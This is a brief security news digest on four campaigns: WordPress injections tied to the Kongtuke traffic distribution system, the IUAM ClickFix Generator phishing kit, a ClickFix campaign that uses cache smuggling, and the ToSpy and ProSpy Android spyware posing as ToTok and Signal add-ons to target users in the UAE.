WordPress sites are being exploited to inject malicious JavaScript that redirects users to phishing pages. The attacks use a theme-related file to load a dynamic payload from a remote server, which includes a JavaScript file and a hidden iframe mimicking legitimate Cloudflare assets. The domain involved is part of a traffic distribution system (TDS) known as Kongtuke. The campaign highlights the need for securing WordPress sites and keeping software up-to-date. Additionally, a new phishing kit named IUAM ClickFix Generator allows attackers to create customizable phishing pages mimicking browser verification challenges. This kit has been used to deploy information stealers like DeerStealer and Odyssey Stealer. The emergence of such tools lowers the barrier to entry for cybercriminals, enabling sophisticated, multi-platform attacks. A new ClickFix campaign employs cache smuggling to evade detection, using the browser's cache to store malicious data without downloading files or communicating with the internet. The attack masquerades as a Fortinet VPN Compliance Checker, executing an obfuscated payload via a PowerShell script.
ToSpy and ProSpy spyware targeting UAE users
Two spyware families, ToSpy and ProSpy, are targeting Android users in the UAE by masquerading as the ToTok app and as Signal encryption plugins. ToTok, a messaging app developed by G42 and backed by the UAE government, was exposed as spyware in 2019 and removed from the major app stores, but it still circulates outside official channels, which gives the malicious look-alikes cover. The ToSpy campaign began on June 30, 2022; the ProSpy campaign has been running since 2024 and was discovered in June 2025; both are ongoing. The spyware is distributed through fake websites that imitate legitimate services and through social engineering, and it requests invasive permissions to exfiltrate device information, contacts, SMS messages, a list of installed applications and various file types. For persistence, it uses Android's AlarmManager to restart its foreground service whenever it is killed and relaunches its background services after a reboot. Google Play Protect is designed to mitigate these threats, but users who install apps from untrusted sources remain at risk.